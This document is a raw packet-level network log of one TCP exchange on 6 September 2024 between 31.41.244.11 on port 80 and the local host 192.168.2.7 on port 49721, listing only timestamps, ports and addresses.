Sep 6, 2024 09:58:09.823296070 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.823302031 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.823307991 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.823343039 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.823354959 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.823376894 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.823383093 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.823385000 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.823412895 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.823503017 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.823510885 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.823534012 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.823539972 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.823551893 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.823553085 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.823585987 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.827430010 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.827441931 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.827455997 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.827517033 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.827538013 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.827543974 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.827555895 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.827562094 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.827568054 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.827579975 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.827600956 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.827610970 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.827615976 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.827627897 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.827632904 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.827639103 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.827650070 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.827651024 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.827651024 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.827657938 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.827663898 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.827666998 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.827671051 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.827676058 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.827708960 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.827708960 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.827722073 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.827944994 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.827976942 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.827994108 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.828001022 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.828030109 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.828048944 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.828069925 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.828123093 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.828181982 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.828188896 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.828200102 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.828206062 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.828212023 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.828218937 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.828231096 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.828231096 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.828246117 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.828295946 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.828304052 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.828346968 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.828352928 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.828356028 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.828394890 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.828450918 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.828457117 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.828468084 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.828474998 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.828486919 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.828495026 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.828500032 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.828516960 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.828563929 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.909008980 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.909023046 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.909051895 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.909060001 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.909066916 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.909073114 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.909079075 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.909085035 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.909091949 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.909097910 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.909104109 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.909167051 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.909168959 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.909176111 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.909188032 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.909194946 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.909218073 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.909231901 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.909235954 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.909243107 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.909254074 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.909296036 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.947030067 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947055101 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947062969 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947069883 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947078943 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947091103 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947098017 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947103024 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947102070 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.947115898 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947120905 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947127104 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947133064 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947175980 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.947200060 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.947319984 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947336912 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947341919 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947374105 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.947418928 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947423935 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947463036 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.947505951 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947510958 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947547913 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.947577000 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947586060 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947608948 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947613001 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.947623968 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947628975 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947642088 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947643042 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.947674036 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.947680950 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947726011 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.947844028 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947850943 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947863102 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947895050 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.947940111 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947946072 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947957993 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.947993040 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.948122025 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948127031 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948142052 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948163033 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948170900 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948177099 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.948189020 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948210001 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.948232889 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.948240042 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948295116 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.948359013 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948470116 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948471069 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.948477983 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948512077 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948519945 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.948534012 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948539972 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948548079 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.948554993 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948559999 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948566914 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948581934 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.948591948 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948628902 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.948652983 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948661089 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948689938 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.948703051 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.948705912 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948712111 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948753119 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.948837996 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948846102 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948857069 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948896885 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.948939085 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948945999 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948951960 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.948976040 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.948992014 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.949007988 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949014902 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949026108 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949053049 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.949143887 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949152946 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949158907 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949166059 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949193954 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.949204922 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.949206114 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949213982 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949246883 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949259996 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.949261904 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949276924 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949284077 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949286938 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.949290991 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949331045 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.949351072 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.949439049 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949448109 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949460983 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949466944 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949487925 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.949518919 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.949536085 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949543953 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949557066 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949584961 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.949605942 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.949712992 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949719906 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949724913 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949753046 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.949755907 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949760914 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949778080 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.949811935 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.949829102 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949837923 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949853897 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949876070 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.949894905 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.949964046 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949970961 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949982882 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.949989080 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.950011969 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.950038910 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.950207949 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.950215101 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.950225115 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.950269938 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.950278044 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.950284958 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.950297117 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.950321913 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.950462103 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.950468063 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.950485945 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.950519085 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.950527906 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.950545073 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.950562954 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.950567961 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.950571060 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.950612068 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.950685024 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.950711966 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.950723886 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.950752974 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.950835943 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.950841904 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.950854063 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.950886011 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.951071978 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.951122046 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.951128960 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.951141119 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.951181889 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.951229095 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.951534986 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.995997906 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.996030092 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.996052027 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.996068001 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.996082067 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.996088028 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.996094942 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.996109009 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.996125937 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.996136904 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.996143103 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.996171951 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.996177912 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.996182919 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.996187925 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.996190071 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.996195078 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.996223927 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.996223927 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.996229887 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.996237040 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.996243954 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.996243954 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.996279001 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.996315002 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.996329069 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.996341944 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.996347904 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:09.996378899 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:09.996387959 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.033886909 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.033901930 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.033915997 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.033922911 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.033932924 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.033940077 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.033953905 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.033961058 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.033981085 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.034044981 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.034050941 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.034091949 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.034127951 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.034132957 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.034147024 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.034162045 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.034168959 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.034182072 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.034183025 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.034188032 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.034210920 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.034233093 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.034405947 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.034413099 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.034431934 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.034466982 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.034470081 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.034476995 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.034487963 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.034492970 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.034495115 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.034526110 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.034548044 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.034606934 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.034660101 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.034715891 CEST	80	49721	31.41.244.11	192.168.2.7
